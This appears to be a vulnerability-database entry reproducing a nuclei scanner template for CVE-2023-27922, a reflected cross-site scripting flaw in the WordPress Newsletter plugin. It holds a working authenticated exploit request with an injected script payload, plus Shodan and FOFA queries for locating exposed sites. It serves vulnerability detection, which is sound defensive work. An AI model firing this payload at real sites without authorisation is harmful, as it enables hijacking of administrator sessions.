nuclei / ProjectDiscovery / NUCLEI:CVE-2023-27922
History: Oct 17, 2023 - 7:20 a.m.

Newsletter < 7.6.9 - Cross-Site Scripting

2023-10-17 07:20:28
ProjectDiscovery (github.com)
Tags: cve2023, wpscan, wordpress, wp-plugin, xss, newsletter, authenticated, thenewsletterplugin

CVSS3: 6.1 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: CHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS: 0.003 Low
Percentile: 68.4%

The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators.

id: CVE-2023-27922

info:
  name: Newsletter < 7.6.9 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as administrators
  reference:
    - https://wpscan.com/vulnerability/eb6ff6f0-60fe-4345-b443-97fd4800418c
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27922
    - https://jvn.jp/en/jp/JVN59341308/
    - https://wordpress.org/plugins/newsletter/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-27922
    cwe-id: CWE-79
    epss-score: 0.00151
    epss-percentile: 0.51292
    cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: thenewsletterplugin
    product: newsletter
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/newsletter/
    fofa-query: body=/wp-content/plugins/newsletter/
    publicwww-query: /wp-content/plugins/newsletter/
  tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,newsletter,authenticated,thenewsletterplugin

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "text/html")'
          - 'contains(tolower(body_2), "_newsletter_")'
          - 'contains(body_2, "><script>alert(document_domain)</script>")'
        condition: and
# digest: 4b0a00483046022100e9167be2b724059df7c707ba66c0e23021841497843387e22cea0938486d9c22022100b72c351c3b3cd00ab824a438f1cb818d13fbcabf2a0980ae0e165e839b80686a:922c64590222798bb761d5b6d8e72950
